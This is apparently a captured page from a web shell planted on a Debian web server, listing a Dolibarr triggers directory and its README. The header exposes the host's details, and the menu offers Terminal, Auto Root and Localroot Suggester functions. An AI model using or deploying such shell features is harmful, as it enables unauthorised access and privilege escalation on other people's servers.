Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.152
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
html /
btm2000.apps-dev.fr /
core /
triggers /
Delete
Unzip
Name
Size
Permission
Date
Action
README
639
B
-rw-r--r--
2023-12-15 13:44
README-FR
757
B
-rw-r--r--
2023-12-15 13:44
dolibarrtriggers.class.php
3.44
KB
-rw-r--r--
2023-12-15 13:44
interface_20_all_Logevents.class.php
7.61
KB
-rw-r--r--
2023-12-15 13:44
interface_20_modWorkflow_WorkflowManager.class.php
22.35
KB
-rw-r--r--
2023-12-15 13:44
interface_50_modAgenda_ActionsAuto.class.php
50.74
KB
-rw-r--r--
2023-12-15 13:44
interface_50_modBlockedlog_ActionsBlockedLog.class.php
5.96
KB
-rw-r--r--
2023-12-15 13:44
interface_50_modEventOrganization_EventOrganization.class.php
4.85
KB
-rw-r--r--
2023-12-15 13:44
interface_50_modLdap_Ldapsynchro.class.php
28.48
KB
-rw-r--r--
2023-12-15 13:44
interface_50_modMailmanspip_Mailmanspipsynchro.class.php
5.64
KB
-rw-r--r--
2023-12-15 13:44
interface_50_modNotification_Notification.class.php
5.69
KB
-rw-r--r--
2023-12-15 13:44
interface_50_modTicket_TicketEmail.class.php
18.71
KB
-rw-r--r--
2023-12-15 13:44
interface_80_modStripe_Stripe.class.php
10.38
KB
-rw-r--r--
2023-12-15 13:44
interface_90_modSociete_ContactRoles.class.php
4.53
KB
-rw-r--r--
2023-12-15 13:44
interface_95_modWebhook_WebhookTriggers.class.php
4.34
KB
-rw-r--r--
2023-12-15 13:44
interface_95_modZapier_ZapierTriggers.class.php
16.64
KB
-rw-r--r--
2023-12-15 13:44
Save
Rename
Directory content -------------------------------------------------------- This directory contains all available Dolibarr triggers. Trigger file name syntax is: > interface_modModule_Mytrigger.php[-NORUN] where: > modModule is part of module descriptor file name found in core/modules directory or value 'all' if not enabled by a particular module. > Mytrigger is name of the trigger. The PHP class inside the trigger file would be named InterfaceMytrigger. > -NORUN is optional and disable completely a trigger file if set. To use a trigger with such a name, rename file to remove the -NORUN part.